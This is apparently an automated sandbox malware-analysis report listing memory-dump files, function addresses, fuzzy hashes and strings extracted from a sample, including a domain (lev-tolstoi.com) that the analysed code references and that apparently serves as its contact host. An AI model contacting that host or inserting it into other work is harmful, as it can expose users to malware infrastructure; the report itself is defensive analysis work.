Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: VN$VN$i$i
API String ID: 0-1885346908
Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction ID: 69b61b8ea38a1ae398913c75d3475909b0d9ee1ce1d3227ff8bd9efec3772dc8
Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction Fuzzy Hash: 1521F3215083918BD3058E6590422A7BBE3AFC6328F2C465ED0F15B395EA3BC90A8757

Function 00F39D30 Relevance: 4.3, Strings: 3, Instructions: 528COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00F39F20
_^]\, xrefs: 00F39D60
_^]\, xrefs: 00F3A261, 00F39F06

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: _^]\$_^]\$_^]\
API String ID: 0-3175222818
Opcode ID: 5c5373c37617673bf02cd7ee3b3a8840baf6e3782608bf03f14e6f870fc7b99a
Instruction ID: 2826e0606d66b14baf4390c62f09d4ff3048f99b3c7a0e280991e0fc795dcbd3
Opcode Fuzzy Hash: 5c5373c37617673bf02cd7ee3b3a8840baf6e3782608bf03f14e6f870fc7b99a
Instruction Fuzzy Hash: 1ED12476E0C3108BD314DE26CC8162BBB92ABC5734F1A8A2CE9D957395D7B0DC4697C2

Function 00F09780 Relevance: 4.2, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

A, xrefs: 00F09922
1, xrefs: 00F09A7B
275FADAC3E1ECC72BEBA0C6A975F1733, xrefs: 00F09861

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: 1$275FADAC3E1ECC72BEBA0C6A975F1733$A
API String ID: 0-771581998
Opcode ID: 43c6f85871ead574efa2644bcb7255eadee37f87e533cad202475dc93942b1b8
Instruction ID: 5ebe9c9ecf520777db3b79077a026032fbb5714bbeab5692b629d35ae2fe329a
Opcode Fuzzy Hash: 43c6f85871ead574efa2644bcb7255eadee37f87e533cad202475dc93942b1b8
Instruction Fuzzy Hash: DFD115B560C3508BD718DF24C8517ABBBE1EBC5314F08896DE4D9CB282DB788906DB96

Function 00F2A0CA Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

<\hX, xrefs: 00F2A236
.txt, xrefs: 00F2A371
_^]\, xrefs: 00F2A49C, 00F2A188

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: .txt$<\hX$_^]\
API String ID: 0-3117400391
Opcode ID: 84f44b9a3001dc9d481c8b28ec86ccfcfacfc4bd8ccf418d36dbcc8041991b7c
Instruction ID: 40779506ed707b7617dae985f4314a77503d16deeaa1468d2ad1e98719e3ca4a
Opcode Fuzzy Hash: 84f44b9a3001dc9d481c8b28ec86ccfcfacfc4bd8ccf418d36dbcc8041991b7c
Instruction Fuzzy Hash: E2C1447590C341DFD704EF28EC8162ABBE2AF96320F088A6CF595472A2D735D945EB13

Function 00F0D4F3 Relevance: 4.0, Strings: 3, Instructions: 295COMMON

Download Yara Rule

Strings

V], xrefs: 00F0D6E4
Fm, xrefs: 00F0D6DD
lev-tolstoi.com, xrefs: 00F0D819

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: Fm$V]$lev-tolstoi.com
API String ID: 0-1622397547
Opcode ID: 0fe7505e4f89dfd958c8dc2ea7ccb10d983db9a97075fc3c2837260fbf31aa26
Instruction ID: d10ee4e7b997eea69610238efa582e16492a2a4fd214e773a5969b76584224ef
Opcode Fuzzy Hash: 0fe7505e4f89dfd958c8dc2ea7ccb10d983db9a97075fc3c2837260fbf31aa26
Instruction Fuzzy Hash: 799102B62557408FD325CF69C880652BFA2EFE631872D869CC4954F766C33AE807DB90

Function 00F0D83C Relevance: 4.0, Strings: 3, Instructions: 278COMMON

Download Yara Rule

Strings

Fm, xrefs: 00F0DA1E
lev-tolstoi.com, xrefs: 00F0DB46
V], xrefs: 00F0DA25

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
